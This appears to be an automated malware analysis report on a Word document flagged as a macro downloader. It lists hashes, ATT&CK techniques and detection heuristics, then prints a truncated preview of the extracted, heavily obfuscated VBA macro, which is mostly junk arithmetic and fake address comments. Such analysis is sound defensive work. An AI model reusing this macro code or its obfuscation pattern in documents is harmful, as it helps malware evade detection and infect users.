Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fce3cb5ebf184419…

MALICIOUS

Office (OLE)

Size: 281.5 KB
Created: 2019-10-11 06:46:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: b83fe468d19320f6d43d1b41618c4c0c
SHA-1: 68e21077c06e932019f62af115ddb525782dcfd9
SHA-256: fce3cb5ebf184419ddfb0eec24a4a0eefa9b581366ac8a6ba9faa8308979e401
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an AutoOpen macro and GetObject calls suggests an attempt to automatically execute malicious code upon opening. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code appears to be heavily obfuscated with random-looking variable names and mathematical operations, likely to hinder analysis and disguise its true purpose of downloading and executing a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7329510-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7329510-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 83032 bytes
SHA-256: 034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "c0700907660"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b270861x0570"
Function cb123x4531b7()
On Error Resume Next
   'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru
c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233)
'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway
b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453)
'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island
x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862)
'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories
x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585)
'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam
x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626)
'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati
bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6)
'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea
c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902)
'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece
'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua
c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356)
'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau
b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426)
'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic
c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567)
'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso
b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430)
'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S)
c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388)
'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands
b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220)
'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia
c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398)
'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau
   'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands
c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54)
'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates
b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65)
'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau
bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543)
'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana
b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657)
'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse
... (truncated)